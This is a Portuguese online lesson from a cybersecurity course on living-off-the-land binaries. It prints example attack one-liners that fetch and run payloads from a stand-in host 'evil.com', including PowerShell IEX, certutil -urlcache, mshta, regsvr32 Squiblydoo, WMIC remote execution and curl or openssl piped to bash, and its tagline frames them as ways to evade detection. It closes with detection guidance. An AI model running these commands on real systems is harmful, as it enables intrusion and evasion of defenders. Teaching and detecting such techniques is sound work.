Binários Living-Off-the-Land (LOLBins)
Use binários confiáveis do Windows (certutil, mshta, regsvr32) para evitar a detecção.
Binários Living-Off-the-Land (LOLBins) é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 2 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.
O que são LOLBins?
Binários Living-Off-the-Land (LOLBins) são binários e ferramentas legítimos do sistema operacional reutilizados por invasores para realizar ações maliciosas. Como são ferramentas do sistema confiáveis e assinadas, geralmente ignoram a lista de permissões de aplicativos e reduzem a detecção por AV/EDR.
Por que os LOLBins são eficazes
Vantagens para os invasores:
- Sempre estão presentes nos sistemas-alvo — não é necessário inserir novos arquivos
- Assinados pela Microsoft/Apple — ignoram a detecção baseada em assinaturas
- São confiáveis para as soluções de lista de permissões de aplicativos
- Geram árvores de processos com aparência legítima
PowerShell como LOLBin
PowerShell é o LOLBin mais abusado. Os invasores usam:
# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"certutil
certutil.exe é uma ferramenta de certificados do Windows que pode baixar arquivos:
# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exemshta e wscript
Execução de scripts por meio de hosts confiáveis:
# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.jsregsvr32 Squiblydoo
regsvr32.exe pode carregar e executar DLLs de URLs remotas por meio dos sinalizadores /s /n /u /i — ignorando o AppLocker e executando código não assinado como um processo confiável:
regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dllExecução com WMIC e WMI
O Windows Management Instrumentation executa código remotamente e localmente:
# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"Rundll32
rundll32.exe carrega e executa pontos de entrada de DLL:
# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payloadLOLBins do Linux
Equivalentes no Linux:
# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.ioLOLBAS e GTFOBins
Bancos de dados de referência:
- LOLBAS (lolbas-project.github.io) — binários, scripts e bibliotecas do Windows
- GTFOBins (gtfobins.github.io) — binários do Linux/macOS para exploração, leitura/gravação de arquivos e elevação de SUID
Detecção do abuso de LOLBins
Estratégias de detecção:
- Registro de blocos de script do PowerShell (EventID 4104) — registra comandos decodificados
- Sysmon EventID 1: criação de processos com a cadeia de processos pai
- Gere alertas para relações pai-filho inesperadas: Word → PowerShell, Excel → cmd
- Conexões de rede originadas de certutil, mshta e powershell
- Linhas de base de UEBA para sinalizar o uso anormal de binários
Verificação rápida: LOLBins
Qual binário do Windows pode baixar um arquivo remoto usando o sinalizador -urlcache?
Recapitulação da lição
LOLBins são ferramentas legítimas do sistema operacional reutilizadas para fins maliciosos: PowerShell, certutil, mshta, regsvr32, rundll32 e WMIC no Windows; curl, python e openssl no Linux. Eles ignoram a detecção por assinaturas e as listas de permissões de aplicativos. A detecção exige o registro da criação de processos (Sysmon), o registro de blocos de script do PowerShell e linhas de base comportamentais. LOLBAS e GTFOBins são bancos de dados de referência essenciais.
Perguntas Frequentes
A aula “Binários Living-Off-the-Land (LOLBins)” é grátis?
Sim — o texto completo de “Binários Living-Off-the-Land (LOLBins)” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.
O que vou aprender em “Binários Living-Off-the-Land (LOLBins)”?
Use binários confiáveis do Windows (certutil, mshta, regsvr32) para evitar a detecção. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Cyber Security Academy?
Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 2 de 4.
Quanto tempo leva a aula “Binários Living-Off-the-Land (LOLBins)”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Cyber Security Academy?
Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Frameworks de C2: Cobalt Strike e Sliver
- Binários Living-Off-the-Land (LOLBins)
- Técnicas de Movimentação Lateral
- Redação de Relatórios de Red Team